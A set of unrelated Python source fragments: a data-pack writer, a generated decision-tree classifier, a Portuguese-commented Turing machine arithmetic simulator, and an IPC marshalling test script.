out_path = self.sub_output_path(input_pack)
self._csv_writer.writerow([input_pack.pack_name, out_path])
self.article_count += 1
if self.article_count % 1000 == 0:
logging.info(
"Written %s to %s", self.article_count, self.configs.output_dir
)
def finish(self, _: Resources):
if self.configs.use_input_index and self.configs.input_index_file:
self._input_index_file.close()
| |
34, "metric_value": 0.232, "depth": 11}
if obj[5]>1:
# {"feature": "Direction_same", "instances": 18, "metric_value": 0.1049, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[5]<=1:
# {"feature": "Direction_same", "instances": 16, "metric_value": 0.375, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]<=3:
return 'True'
else: return 'True'
else: return 'True'
elif obj[9]<=0.0:
# {"feature": "Occupation", "instances": 22, "metric_value": 0.3697, "depth": 9}
if obj[6]>5:
# {"feature": "Gender", "instances": 12, "metric_value": 0.2593, "depth": 10}
if obj[3]<=0:
# {"feature": "Education", "instances": 9, "metric_value": 0.1778, "depth": 11}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Education", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]<=5:
# {"feature": "Education", "instances": 10, "metric_value": 0.3167, "depth": 10}
if obj[5]<=0:
# {"feature": "Gender", "instances": 6, "metric_value": 0.1667, "depth": 11}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.25, "depth": 11}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[7]>3.0:
# {"feature": "Time", "instances": 61, "metric_value": 0.4287, "depth": 6}
if obj[1]>0:
# {"feature": "Occupation", "instances": 49, "metric_value": 0.4074, "depth": 7}
if obj[6]<=12:
# {"feature": "Age", "instances": 36, "metric_value": 0.3333, "depth": 8}
if obj[4]>0:
# {"feature": "Education", "instances": 27, "metric_value": 0.4386, "depth": 9}
if obj[5]>0:
# {"feature": "Gender", "instances": 19, "metric_value": 0.4613, "depth": 10}
if obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 17, "metric_value": 0.4563, "depth": 11}
if obj[9]>1.0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.4628, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[9]<=1.0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.4444, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[9]<=4.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 8, "metric_value": 0.3333, "depth": 10}
if obj[9]>0.0:
# {"feature": "Gender", "instances": 6, "metric_value": 0.2778, "depth": 11}
if obj[3]<=1:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.2778, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[9]<=0.0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[3]<=1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=0:
return 'True'
else: return 'True'
elif obj[6]>12:
# {"feature": "Gender", "instances": 13, "metric_value": 0.3916, "depth": 8}
if obj[3]<=0:
# {"feature": "Age", "instances": 11, "metric_value": 0.4606, "depth": 9}
if obj[4]>1:
# {"feature": "Education", "instances": 6, "metric_value": 0.4444, "depth": 10}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 6, "metric_value": 0.4444, "depth": 11}
if obj[9]<=1.0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.4444, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=1:
# {"feature": "Education", "instances": 5, "metric_value": 0.48, "depth": 10}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 5, "metric_value": 0.48, "depth": 11}
if obj[9]<=4.0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Occupation", "instances": 12, "metric_value": 0.3333, "depth": 7}
if obj[6]<=12:
# {"feature": "Age", "instances": 8, "metric_value": 0.3333, "depth": 8}
if obj[4]>0:
# {"feature": "Gender", "instances": 6, "metric_value": 0.2667, "depth": 9}
if obj[3]<=0:
# {"feature": "Education", "instances": 5, "metric_value": 0.3, "depth": 10}
if obj[5]>2:
# {"feature": "Restaurant20to50", "instances": 4, "metric_value": 0.375, "depth": 11}
if obj[9]<=4.0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.375, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[5]<=2:
return 'False'
else: return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[4]<=0:
return 'True'
else: return 'True'
elif obj[6]>12:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[11]>2:
# {"feature": "Age", "instances": 271, "metric_value": 0.4868, "depth": 4}
if obj[4]<=5:
# {"feature": "Passanger", "instances": 232, "metric_value": 0.4871, "depth": 5}
if obj[0]>0:
# {"feature": "Education", "instances": 223, "metric_value": 0.4918, "depth": 6}
if obj[5]>1:
# {"feature": "Occupation", "instances": 138, "metric_value": 0.4876, "depth": 7}
if obj[6]<=16:
# {"feature": "Bar", "instances": 122, "metric_value": 0.4891, "depth": 8}
if obj[7]<=3.0:
# {"feature": "Restaurant20to50", "instances": 118, "metric_value": 0.4822, "depth": 9}
if obj[9]<=2.0:
# {"feature": "Time", "instances": 108, "metric_value": 0.496, "depth": 10}
if obj[1]>0:
# {"feature": "Gender", "instances": 93, "metric_value": 0.4982, "depth": 11}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 52, "metric_value": 0.497, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 41, "metric_value": 0.4997, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Gender", "instances": 15, "metric_value": 0.4571, "depth": 11}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.5, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4082, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[9]>2.0:
# {"feature": "Time", "instances": 10, "metric_value": 0.1333, "depth": 10}
if obj[1]<=1:
return 'False'
elif obj[1]>1:
# {"feature": "Gender", "instances": 3, "metric_value": 0.0, "depth": 11}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
elif obj[7]>3.0:
# {"feature": "Time", "instances": 4, "metric_value": 0.3333, "depth": 9}
if obj[1]<=1:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.3333, "depth": 10}
if obj[9]>1.0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[9]<=1.0:
return 'True'
else: return 'True'
elif obj[1]>1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>16:
# {"feature": "Bar", "instances": 16, "metric_value": 0.4042, "depth": 8}
if obj[7]>0.0:
# {"feature": "Time", "instances": 10, "metric_value": 0.4, "depth": 9}
if obj[1]>0:
# {"feature": "Restaurant20to50", "instances": 9, "metric_value": 0.3333, "depth": 10}
if obj[9]<=1.0:
# {"feature": "Gender", "instances": 6, "metric_value": 0.25, "depth": 11}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.375, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[9]>1.0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.0, "depth": 11}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[1]<=0:
return 'False'
else: return 'False'
elif obj[7]<=0.0:
# {"feature": "Time", "instances": 6, "metric_value": 0.25, "depth": 9}
if obj[1]>0:
# {"feature": "Restaurant20to50", "instances": 4, "metric_value": 0.3333, "depth": 10}
if obj[9]<=1.0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[3]<=1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[9]>1.0:
return 'True'
else: return 'True'
elif obj[1]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[5]<=1:
# {"feature": "Occupation", "instances": 85, "metric_value": 0.4649, "depth": 7}
if obj[6]>4:
# {"feature": "Gender", "instances": 59, "metric_value": 0.481, "depth": 8}
if obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 34, "metric_value": 0.4361, "depth": 9}
if obj[9]<=1.0:
# {"feature": "Bar", "instances": 26, "metric_value": 0.4154, "depth": 10}
if obj[7]>0.0:
# {"feature": "Time", "instances": 16, "metric_value": 0.3, "depth": 11}
if obj[1]>0:
# {"feature": "Direction_same", "instances": 15, "metric_value": 0.32, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[1]<=0:
return 'False'
else: return 'False'
elif obj[7]<=0.0:
# {"feature": "Time", "instances": 10, "metric_value": 0.4, "depth": 11}
if obj[1]>0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.5, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
elif obj[1]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[9]>1.0:
# {"feature": "Time", "instances": 8, "metric_value": 0.2083, "depth": 10}
if obj[1]>0:
# {"feature": "Bar", "instances": 6, "metric_value": 0.2222, "depth": 11}
if obj[7]>0.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
elif obj[7]<=0.0:
return 'False'
else: return 'False'
elif obj[1]<=0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[3]>0:
# {"feature": "Time", "instances": 25, "metric_value": 0.419, "depth": 9}
if obj[1]>0:
# {"feature": "Restaurant20to50", "instances": 21, "metric_value": 0.4698, "depth": 10}
if obj[9]>0.0:
# {"feature": "Bar", "instances": 15, "metric_value": 0.44, "depth": 11}
if obj[7]<=1.0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.5, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
elif obj[7]>1.0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[9]<=0.0:
# {"feature": "Bar", "instances": 6, "metric_value": 0.2222, "depth": 11}
if obj[7]<=0.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[7]>0.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=4:
# {"feature": "Time", "instances": 26, "metric_value": 0.3615, "depth": 8}
if obj[1]<=1:
# {"feature": "Bar", "instances": 20, "metric_value": 0.3059, "depth": 9}
if obj[7]<=2.0:
# {"feature": "Restaurant20to50", "instances": 17, "metric_value": 0.3451, "depth": 10}
if obj[9]<=2.0:
# {"feature": "Gender", "instances": 15, "metric_value": 0.3909, "depth": 11}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.3967, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.375, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[9]>2.0:
return 'True'
else: return 'True'
elif obj[7]>2.0:
return 'True'
else: return 'True'
elif obj[1]>1:
# {"feature": "Bar", "instances": 6, "metric_value": 0.4, "depth": 9}
if obj[7]<=1.0:
# {"feature": "Restaurant20to50", "instances": 5, "metric_value": 0.3, "depth": 10}
if obj[9]<=2.0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.3333, "depth": 11}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[9]>2.0:
return 'True'
else: return 'True'
elif obj[7]>1.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[0]<=0:
# {"feature": "Gender", "instances": 9, "metric_value": 0.1481, "depth": 6}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
# {"feature": "Occupation", "instances": 3, "metric_value": 0.0, "depth": 7}
if obj[6]<=5:
return 'True'
elif obj[6]>5:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[4]>5:
# {"feature": "Education", "instances": 39, "metric_value": 0.3199, "depth": 5}
if obj[5]>0:
# {"feature": "Bar", "instances": 29, "metric_value": 0.2188, "depth": 6}
if | |
import os
class TuringMachine:
def __init__(self):
print(self)
@staticmethod
def getInputData():
return input("\n\t\t\t\t\t Digite o Numero : ")
# ***********************************************************************
def divisao(self):
# ***********************************************************************
numero1 = int(self.getInputData())
numero2 = int(self.getInputData())
ret = ['>']
for item in range(numero1):
ret.append('*')
ret.append('_')
for item in range(numero2):
ret.append('*')
ret.append('_')
for item in range(int(numero1 / numero2)):
ret.append('_')
ret.append('_')
for item in range(numero1 % numero2):
ret.append('_')
estado = -1
pos = 0
while (estado != 21):
marc = []
for i in range(pos):
marc.append(' ')
marc.append('|')
auxmarc = ''.join(marc)
print('{0}'.format(auxmarc))
aux = ''.join(ret)
print('{0} \n'.format(aux))
if (estado == -1):
pos += 1
estado += 1
elif (estado == 0):
if ret[pos] == '*':
estado = 1
ret[pos] = '$'
pos += 1
elif (estado == 1):
if (ret[pos] == '*'):
pos += 1
else:
estado = 2
pos += 1
elif (estado == 2):
if (ret[pos] == '*'):
pos += 1
else:
estado = 3
pos -= 1
elif (estado == 3):
if (ret[pos] == '*'):
estado = 4
ret[pos] = '$'
pos -= 1
elif (estado == 4):
if (ret[pos] == '*'):
estado = 5
pos -= 1
else:
estado = 10
pos += 1
elif (estado == 5):
if (ret[pos] == '*'):
pos -= 1
elif (ret[pos] == '$'):
estado = 6
pos += 1
else:
pos -= 1
elif (estado == 6):
if (ret[pos] == '*'):
estado = 7
ret[pos] = '$'
pos += 1
else:
estado = 12
pos += 1
elif (estado == 7):
if (ret[pos] == '*'):
pos += 1
elif (ret[pos] == '$'):
estado = 3
pos -= 1
else:
estado = 8
pos += 1
elif (estado == 8):
if (ret[pos] == '*'):
pos += 1
elif (ret[pos] == '$'):
estado = 3
pos -= 1
else:
estado = 3
pos -= 1
elif (estado == 9):
if (ret[pos] == '_'):
estado = 10
pos += 1
elif (estado == 10):
if (ret[pos] == '$'):
estado = 10
ret[pos] = '*'
pos += 1
else:
estado = 11
pos += 1
elif (estado == 11):
if (ret[pos] == '*'):
pos += 1
else:
estado = 5
ret[pos] = '*'
pos -= 1
elif (estado == 12):
if (ret[pos] == '*'):
pos += 1
elif (ret[pos] == '$'):
estado = 13
pos += 1
else:
estado = 20
ret[pos] = '>'
pos -= 1
elif (estado == 13):
if (ret[pos] == '$'):
pos += 1
else:
estado = 14
pos += 1
elif (estado == 14):
if (ret[pos] == '*'):
pos += 1
else:
estado = 15
pos += 1
elif (estado == 15):
if (ret[pos] == '*'):
pos += 1
else:
estado = 16
ret[pos] = '*'
pos -= 1
elif (estado == 16):
if (ret[pos] == '>'):
estado = 18
pos -= 1
elif (ret[pos] == '$'):
estado = 17
pos -= 1
else:
pos -= 1
elif (estado == 17):
if (ret[pos] == '*'):
estado = 18
pos += 1
else:
pos -= 1
elif (estado == 18):
if (ret[pos] == '$'):
estado = 19
ret[pos] = '*'
pos += 1
elif (estado == 19):
if (ret[pos] == '$'):
estado = 13
pos += 1
else:
estado = 20
ret[pos] = '>'
pos -= 1
elif (estado == 20):
if (ret[pos] == '>'):
estado = 21
ret[pos] = '_'
pos += 1
else:
ret[pos] = '_'
pos -= 1
marc = []
for i in range(pos):
marc.append(' ')
marc.append('|')
auxmarc = ''.join(marc)
print('{0} \n'.format(auxmarc))
aux = ''.join(ret)
print('{0} \n'.format(aux))
p = 0
for item in range(len(ret)):
if (ret[item] == '>'):
break
p += 1
for item in range(p):
ret.remove('_')
print('Fim do procedimento ')
print(''.join(ret))
# ***********************************************************************
def igualar(self):
# ***********************************************************************
numero1 = self.getInputData()
numero2 = self.getInputData()
numero1 = int(numero1)
numero2 = int(numero2)
ret = ['>']
for item in range(numero1):
ret.append('*')
ret.append('_')
for item in range(numero2):
ret.append('*')
if (numero2 != 0):
for item in range(numero1 - numero2 + 1):
ret.append('_')
else:
for item in range(numero1):
ret.append('_')
ret.append('_')
estado = -1
pos = 0
while (estado != 9):
marc = []
for i in range(pos):
marc.append(' ')
marc.append('|')
auxmarc = ''.join(marc)
print('{0}'.format(auxmarc))
aux = ''.join(ret)
print('{0} \n'.format(aux))
if (estado == -1):
pos += 1
estado += 1
elif (estado == 0):
if ret[pos] == '*':
estado = 1
ret[pos] = '$'
pos += 1
else:
estado = 7
pos +=1
elif (estado == 1):
if (ret[pos] == '*'):
pos += 1
estado = 2;
else:
estado = 6
pos += 1
elif (estado == 2):
if (ret[pos] == '*'):
pos += 1
else:
estado = 3
pos += 1
elif (estado == 3):
if (ret[pos] == '*'):
estado = 4
ret[pos] = '$'
pos -= 1
elif(ret[pos] == '$'):
pos += 1
else:
estado = 4
ret[pos] = '$'
pos -= 1
elif (estado == 4):
if (ret[pos] == '*'):
estado = 5
pos -= 1
else:
pos -= 1
elif (estado == 5):
if (ret[pos] == '$'):
estado = 0
pos += 1
else:
pos -= 1
elif (estado == 6):
if (ret[pos] == '$'):
pos += 1
else:
estado = 7
ret[pos] = '$'
pos += 1
elif (estado == 7):
if (ret[pos] == '*'):
pos += 1
else:
estado = 8
pos -= 1
elif (estado == 8):
if (ret[pos] == '>'):
estado = 9
pos += 1
elif (ret[pos] == '$'):
ret[pos] = '*'
pos -= 1
else:
ret[pos] = '_'
pos -= 1
marc = []
for i in range(pos):
marc.append(' ')
marc.append('|')
auxmarc = ''.join(marc)
print('{0} \n'.format(auxmarc))
aux = ''.join(ret)
print('{0} \n'.format(aux))
print(''.join(ret))
# ***********************************************************************
def soma(self):
# ***********************************************************************
numero1 = self.getInputData()
numero2 = self.getInputData()
operador1 = ""
operador2 = ""
i = 0
for i in range(int(numero1)):
operador1 += "*"
i = 0
for i in range(int(numero2)):
operador2 += "*"
res = operador1 + " " + operador2 + ""
# os.system("cls")
print("\n\t\t________________________SOMA_______________________")
print("Valores: " + res)
res = list(res)
estado = "q0"
print("Estado Atual | Leu | Posicao | Escreveu | Direcao | Proximo Estado")
print("\n")
i = 0
# for i in range(len(res)):
for i, item in enumerate(res):
if res[i] == "*" and estado == "q0":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q0")
print("\n")
continue
elif res[i] == " " and estado == "q0":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q1")
print("\n")
res[i] = "*"
estado = "q1"
continue
elif res[i] == "*" and estado == "q1":
print("\tq1\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q1")
print("\n")
continue
elif res[i] == " " and estado == "q1":
print("\tq1\t "+res[i]+"\t "+str(i) +
"\t "+" \t E \t\t q2")
print("\n")
res[i - 1] = " "
estado = "q2"
print("\tq2\t "+res[i]+"\t "+str(i - 1) +
"\t "+" \t FIM \t\t q2")
break
print("\n")
print("\n")
result = ''.join(res)
print("Resultado: " + result)
# **********************************************************************
def multiplicacao(self):
# **********************************************************************
numero1 = self.getInputData()
numero2 = self.getInputData()
operador1 = ""
operador2 = ""
for i in numero1:
operador1 += "*"
for i in numero2:
operador2 += "*"
res = operador1 + " " + operador2 + " "
print("\n\t\t_____________________MULTIPLICACAO______________________________")
print("\n")
print("Valores : " + res)
res = list(res)
estado = "q0"
i = 0
print("Estado Atual | Leu | Posicao | Escreveu | Direcao | Proximo Estado")
print("\n")
while i != -2:
if res[i] == "*" and estado == "q0":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q1")
print("\n")
i += 1
elif res[i] == " " and estado == "q0":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q10")
print("\n")
estado = "q10"
i += 1
elif res[i] == "*" and estado == "q1":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q1")
print("\n")
i += 1
elif res[i] == " " and estado == "q1":
| |
<filename>test/test.py
# To run:
# gmake install in $IPC_DIR/python
# export PYTHONPATH="$IPC_DIR/python:$IPC_DIR/lib/$SYS"
# where IPC_DIR is the location of IPC and SYS is the system type
# (e.g., Linux-3.8)
# Run $IPC_DIR/bin/$SYS/central in a separate terminal
# export CENTRALHOST=localhost
# python
# import test; test.main()
# Follow the instructions (you need to enter input and start/stop the
# $IPC_DIR/test/module2 program (which needs to be built first)
# You can then compare the output against test.py.output.
# Except for differences in pointer values, and occasional swaps in which
# handler fires first, they should be identical
from primFmttrs import *
from formatters import *
from _IPC import *
from IPC import *
printByteArrayP = True
def printVC (vc) :
if (printByteArrayP) :
printByteArray(vc.content, vc.length)
class sample0(IPCdata) :
_fields = ('d1', 'd2')
class sample1(IPCdata) :
_fields = ('c1', 'c2')
def test0 () :
IPC_initialize()
buf = createBuffer(createByteArray(10))
ds = sample0()
ds.d1 = 666.0
it = DOUBLE_Trans()
it.Encode(ds, 0, buf)
printBuffer(buf)
rewindBuffer(buf)
it.Decode(ds, 1, buf)
print(ds.d2)
print(it.ELength(ds, 1))
print(it.SimpleType())
ar = [1, 2, 3]
rewindBuffer(buf)
it.EncodeElement(ar, 1, buf)
printBuffer(buf)
rewindBuffer(buf)
it.DecodeElement(ar, 2, buf)
print(ar)
def test1 () :
IPC_initialize()
buf = createBuffer(createByteArray(10))
ds = sample1()
ds.c1 = 'h'
st = CHAR_Trans()
st.Encode(ds, 0, buf)
printBuffer(buf)
rewindBuffer(buf)
st.Decode(ds, 1, buf)
print(ds.c2)
print(st.ELength(ds, 1))
print(st.SimpleType())
ar = ['e', 'm', 'c']
rewindBuffer(buf)
st.EncodeElement(ar, 1, buf)
printBuffer(buf)
rewindBuffer(buf)
st.DecodeElement(ar, 2, buf)
print(ar)
# This tests all the primitives
def test2 () :
IPC_initialize()
fmt1 = IPC_parseFormat("int")
vc1 = IPC_VARCONTENT_TYPE()
IPC_marshall(fmt1, 123, vc1)
printVC(vc1)
print(IPC_unmarshallData(fmt1, vc1.content, int))
vc3 = IPC_VARCONTENT_TYPE()
fmt3 = IPC_parseFormat("boolean")
IPC_marshall(fmt3, True, vc3)
printVC(vc3)
print(IPC_unmarshallData(fmt3, vc3.content, bool))
vc4 = IPC_VARCONTENT_TYPE()
fmt4 = IPC_parseFormat("float")
IPC_marshall(fmt4, 55.0, vc4)
printVC(vc4)
print(IPC_unmarshallData(fmt4, vc4.content, float))
vc2 = IPC_VARCONTENT_TYPE()
fmt2 = IPC_parseFormat("double")
IPC_marshall(fmt2, 666.0, vc2)
printVC(vc2)
print(IPC_unmarshallData(fmt2, vc2.content, float))
vc5 = IPC_VARCONTENT_TYPE()
fmt5 = IPC_parseFormat("byte")
IPC_marshall(fmt5, 0XA, vc5)
printVC(vc5)
print(IPC_unmarshallData(fmt5, vc5.content, int))
vc5 = IPC_VARCONTENT_TYPE()
fmt5 = IPC_parseFormat("ubyte")
IPC_marshall(fmt5, 0XFA, vc5)
printVC(vc5)
print(IPC_unmarshallData(fmt5, vc5.content, int))
vc6 = IPC_VARCONTENT_TYPE()
fmt6 = IPC_parseFormat("string")
IPC_marshall(fmt6, "hello", vc6)
printVC(vc6)
print(IPC_unmarshallData(fmt6, vc6.content, str))
vc6 = IPC_VARCONTENT_TYPE()
fmt6 = IPC_parseFormat("string")
IPC_marshall(fmt6, "", vc6)
printVC(vc6)
print(IPC_unmarshallData(fmt6, vc6.content, str))
# vc6 = IPC_VARCONTENT_TYPE()
# fmt6 = IPC_parseFormat("string")
# IPC_marshall(fmt6, None, vc6)
# printVC(vc6)
# print(IPC_unmarshallData(fmt6, vc6.content, str))
vc7 = IPC_VARCONTENT_TYPE()
fmt7 = IPC_parseFormat("char")
IPC_marshall(fmt7, 'c', vc7)
printVC(vc7)
print(IPC_unmarshallData(fmt7, vc7.content, str))
vc8 = IPC_VARCONTENT_TYPE()
fmt8 = IPC_parseFormat("short")
IPC_marshall(fmt8, 666, vc8)
printVC(vc8)
print(IPC_unmarshallData(fmt8, vc8.content, int))
vc9 = IPC_VARCONTENT_TYPE()
fmt9 = IPC_parseFormat("long")
IPC_marshall(fmt9, 0X7FFFFFFF, vc9)
printVC(vc9)
print(IPC_unmarshallData(fmt9, vc9.content, int))
class struct1(IPCdata) :
_fields = ('i', ('a1', 'struct2'))
class struct2(IPCdata) :
_fields = ('str', 'd')
# test structures
def test3 () :
IPC_initialize()
fmt1 = IPC_parseFormat("{int, {string, double}}")
vc1 = IPC_VARCONTENT_TYPE()
ds = IPCdata()
ds._f0 = 666
ds._f1 = IPCdata();
ds._f1._f0 = "hello"; ds._f1._f1 = 3.14159
IPC_marshall(fmt1, ds, vc1)
printVC(vc1)
print(IPC_unmarshallData(fmt1, vc1.content, struct1))
ds1 = struct1()
ds2 = struct2()
ds1.i = 1234; ds1.a1 = ds2
ds2.str = "eat more spam"; ds2.d = 9.87654321
IPC_marshall(fmt1, ds1, vc1)
printVC(vc1)
ds1a = struct1()
ret = IPC_unmarshall(fmt1, vc1.content, ds1a)
print(ds1a, ret, ds1 == ds1a, ds2 == ds1a.a1)
# Should raise an error
try: IPC_unmarshall(fmt1, vc1.content, ds2)
except Exception as e : print(e)
# test fixed arrays
def test4 () :
IPC_initialize()
fmt1 = IPC_parseFormat("[int :5]")
vc1 = IPC_VARCONTENT_TYPE()
ds1 = list(range(10,15))
IPC_marshall(fmt1, ds1, vc1)
printVC(vc1)
ds1a = [None]*5
IPC_unmarshall(fmt1, vc1.content, ds1a)
print(ds1a)
fmt2 = IPC_parseFormat("[{string, double} :5]")
vc2 = IPC_VARCONTENT_TYPE()
ds2 = [None]*5
foo = ('eat', 'more', 'spam', 'for', 'life')
for i in range(0,5) :
ds2[i] = struct2()
ds2[i].str = foo[i]
ds2[i].d = float(pow(i,3))
IPC_marshall(fmt2, ds2, vc2)
printVC(vc2)
print(IPC_unmarshallData(fmt2, vc2.content, struct2))
fmt3 = IPC_parseFormat("[int : 3, 4]")
vc3 = IPC_VARCONTENT_TYPE()
ds3 = [None]*3; ds3a = [None]*3
for i in range(0, 3) :
ds3[i] = list(range(pow(i+1,2), pow(i+1,2)+4))
ds3a[i] = [None]*4
IPC_marshall(fmt3, ds3, vc3)
printVC(vc3)
IPC_unmarshall(fmt3, vc3.content, ds3a)
print(ds3a)
fmt4 = IPC_parseFormat("[double : 3, 4]")
vc4 = IPC_VARCONTENT_TYPE()
ds4 = [None]*3
for i in range(0, 3) :
ds4[i] = [None]*4
for j in range(0, 4) : ds4[i][j] = (float)(pow(i+1,2)+pow(j+1,2)+4)
IPC_marshall(fmt4, ds4, vc4)
printVC(vc4)
print(IPC_unmarshallData(fmt4, vc4.content, int))
class struct4(IPCdata) :
_fields = ('num', 'ar')
class struct5(IPCdata) :
_fields = (('ar', 'struct2'), 'num')
class struct6(IPCdata) :
_fields = ('dim1', 'dim2', 'ar')
# test variable arrays
def test5 () :
IPC_initialize()
fmt1 = IPC_parseFormat("{int, <int :1>}")
vc1 = IPC_VARCONTENT_TYPE()
ds1 = struct4(); ds1a = struct4()
ds1.num = 5; ds1.ar = list(range(111,116))
IPC_marshall(fmt1, ds1, vc1)
printVC(vc1)
IPC_unmarshall(fmt1, vc1.content, ds1a)
print(ds1a)
fmt2 = IPC_parseFormat("{<{string, double} :2>, int}")
vc2 = IPC_VARCONTENT_TYPE()
ds2 = struct5()
ds2.ar = [None]*5; ds2.num = 5
